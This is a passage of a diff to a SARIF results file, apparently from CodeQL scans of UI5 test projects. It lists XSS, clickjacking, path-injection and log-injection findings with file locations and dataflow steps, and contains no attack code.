"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - }, - "region" : { - "startLine" : 12, - "startColumn" : 26, - "endColumn" : 46 - } - }, - "message" : { - "text" : "new JSONModel(oData)" 
- } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 38 - } - }, - "message" : { - "text" : "content={/output}" - } - } - } ] - } ] - }, { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - }, - "region" : { - "startLine" : 15, - "startColumn" : 25, - "endColumn" : 53 - } - }, - "message" : { - "text" : "oModel. ... 
input')" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - }, - "region" : { - "startLine" : 15, - "startColumn" : 17, - "endColumn" : 53 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - }, - "region" : { - "startLine" : 16, - "startColumn" : 43, - "endColumn" : 48 - } - }, - "message" : { - "text" : "input" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 327 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 29 - } - }, - "message" : { - "text" : "output: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 38 - } - }, - "message" : { - "text" : "content={/output}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 331 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 141 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 348 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 37 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "97b29ed20ac04ff0:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 348 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 343 - }, - "region" : { - "startLine" : 8, - "startColumn" : 40, - "endColumn" : 63 - } - }, - "message" : { - "text" : "\"contro ... 
l.json\"" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 348 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endColumn" : 37 - } - }, - "message" : { - "text" : "content={/input}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 348 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 142 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", - "uriBaseId" : "%SRCROOT%", - "index" : 356 - }, - "region" : { - "startLine" : 8, - "startColumn" : 11, - "endColumn" : 34 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "5edd24be658b61a4:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", - "uriBaseId" : "%SRCROOT%", - "index" : 356 - }, - "region" : { - "startLine" : 5, - "startColumn" : 11, - "endColumn" : 32 - } - }, - "message" : { - "text" : "data-value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 352 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", - "uriBaseId" : "%SRCROOT%", - "index" : 356 - }, - "region" : { - "startLine" : 8, - "startColumn" : 11, - "endColumn" : 34 - } - }, - "message" : { - "text" : "data-content={/input}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", - "uriBaseId" : "%SRCROOT%", - "index" : 356 - }, - "region" : { - "startLine" : 5, - "startColumn" : 11, - "endColumn" : 32 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + 
"location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 143 + } }, { - "ruleId" : "js/ui5-xss", - "rule" : { - "id" : "js/ui5-xss", - "index" : 0, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "XSS vulnerability due to [user-provided value](1).\nXSS vulnerability due to [user-provided value](2)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 410 - }, - "region" : { - "startLine" : 22, - "startColumn" : 5, - "endColumn" : 38 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "6e0d8f690e30e24a:1", - "primaryLocationStartColumnFingerprint" : "0" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 410 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endLine" : 10, - "endColumn" : 27 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 406 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 410 - }, - "region" : { - "startLine" : 22, - "startColumn" : 5, - "endColumn" : 38 - } - }, - "message" : 
{ - "text" : "content={/input}" - } - } - } ] - } ] - }, { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 410 - }, - "region" : { - "startLine" : 15, - "startColumn" : 5, - "endLine" : 18, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 406 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 410 - }, - "region" : { - "startLine" : 22, - "startColumn" : 5, - "endColumn" : 38 - } - }, - "message" : { - "text" : "content={/input}" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 410 - }, - "region" : { - "startLine" : 8, - "startColumn" : 5, - "endLine" : 10, - "endColumn" : 27 - } - }, - "message" : { - "text" : "user-provided value" - } - }, { - "id" : 2, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 410 - }, - "region" : { - "startLine" : 15, - "startColumn" : 5, - "endLine" : 18, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] 
+ "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 144 + } }, { - "ruleId" : "js/ui5-clickjacking", - "rule" : { - "id" : "js/ui5-clickjacking", - "index" : 1, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Possible clickjacking vulnerability due to window\\[ ... onfig\"\\] being set to `allow`." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 136 - }, - "region" : { - "startLine" : 9, - "startColumn" : 9, - "endColumn" : 32 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "6152b8f74a1abdf5:1", - "primaryLocationStartColumnFingerprint" : "0" + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 145 } }, { - "ruleId" : "js/ui5-clickjacking", - "rule" : { - "id" : "js/ui5-clickjacking", - "index" : 1, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Possible clickjacking vulnerability due to data-sap-ui-frameOptions=allow being set to `allow`." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 136 - }, - "region" : { - "startLine" : 28, - "startColumn" : 34, - "endColumn" : 66 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "b01bd23ca3666824:1", - "primaryLocationStartColumnFingerprint" : "25" + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 146 } }, { - "ruleId" : "js/ui5-clickjacking", - "rule" : { - "id" : "js/ui5-clickjacking", - "index" : 1, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Possible clickjacking vulnerability due to missing frame options." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 138 - }, - "region" : { - "startLine" : 2, - "endColumn" : 16 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "7fe81114896a63c:1", - "primaryLocationStartColumnFingerprint" : "0" + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 147 } }, { - "ruleId" : "js/ui5-clickjacking", - "rule" : { - "id" : "js/ui5-clickjacking", - "index" : 1, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Possible clickjacking vulnerability due to missing frame options." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 244 - }, - "region" : { - "startLine" : 2, - "endColumn" : 16 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "df700c15dad274b2:1", - "primaryLocationStartColumnFingerprint" : "0" + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 148 } }, { - "ruleId" : "js/ui5-path-injection", - "rule" : { - "id" : "js/ui5-path-injection", - "index" : 2, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "The path of a saved file depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 214 - }, - "region" : { - "startLine" : 17, - "startColumn" : 43, - "endColumn" : 61 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "68e5ff83e2198ff5:1", - "primaryLocationStartColumnFingerprint" : "26" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 219 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : 
"%SRCROOT%", - "index" : 215 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 214 - }, - "region" : { - "startLine" : 8, - "startColumn" : 23, - "endColumn" : 38 - } - }, - "message" : { - "text" : "{ type: \"int\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 214 - }, - "region" : { - "startLine" : 17, - "startColumn" : 43, - "endColumn" : 61 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 219 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/model.json", + "uriBaseId" : "%SRCROOT%", + "index" : 149 + } }, { - "ruleId" : "js/ui5-path-injection", - "rule" : { - "id" : "js/ui5-path-injection", - "index" : 2, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "The path of a saved file depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 223 - }, - "region" : { - "startLine" : 23, - "startColumn" : 43, - "endColumn" : 55 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "b79de9dff4d8f842:1", - "primaryLocationStartColumnFingerprint" : "26" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 228 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 224 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 223 - }, - "region" : { - "startLine" : 9, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 223 - }, - "region" : { - "startLine" : 15, - 
"startColumn" : 29, - "endColumn" : 47 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 223 - }, - "region" : { - "startLine" : 15, - "startColumn" : 21, - "endColumn" : 47 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 223 - }, - "region" : { - "startLine" : 17, - "startColumn" : 53, - "endColumn" : 58 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 223 - }, - "region" : { - "startLine" : 17, - "startColumn" : 46, - "endColumn" : 59 - } - }, - "message" : { - "text" : "String(value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 223 - }, - "region" : { - "startLine" : 17, - "startColumn" : 36, - "endColumn" : 60 - } - }, - "message" : { - "text" : "encodeX ... 
value))" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 223 - }, - "region" : { - "startLine" : 17, - "startColumn" : 21, - "endColumn" : 60 - } - }, - "message" : { - "text" : "xssSanitized" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 223 - }, - "region" : { - "startLine" : 23, - "startColumn" : 43, - "endColumn" : 55 - } - }, - "message" : { - "text" : "xssSanitized" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 228 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 150 + } }, { - "ruleId" : "js/ui5-path-injection", - "rule" : { - "id" : "js/ui5-path-injection", - "index" : 2, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "The path of a saved file depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 231 - }, - "region" : { - "startLine" : 16, - "startColumn" : 39, - "endColumn" : 67 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "de27f6d546a116e8:1", - "primaryLocationStartColumnFingerprint" : "26" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 236 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 231 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 231 - }, - "region" : { - "startLine" : 16, - "startColumn" : 39, - "endColumn" : 67 - } - }, - "message" : { - "text" : "oModel. ... 
input')" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 236 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 151 + } }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 8, - "startColumn" : 26, - "endColumn" : 31 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "62d5a4db56a18502:1", - "primaryLocationStartColumnFingerprint" : "21" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 6, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "jQuery. ... 
param\")" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 6, - "startColumn" : 9, - "endColumn" : 51 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 8, - "startColumn" : 26, - "endColumn" : 31 - } - }, - "message" : { - "text" : "value" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", - "uriBaseId" : "%SRCROOT%", - "index" : 3 - }, - "region" : { - "startLine" : 6, - "startColumn" : 17, - "endColumn" : 51 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 152 + } }, { - "ruleId" : "js/ui5-log-injection", - "rule" : { - "id" : "js/ui5-log-injection", - "index" : 3, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "Log entry depends on a [user-provided value](1)." 
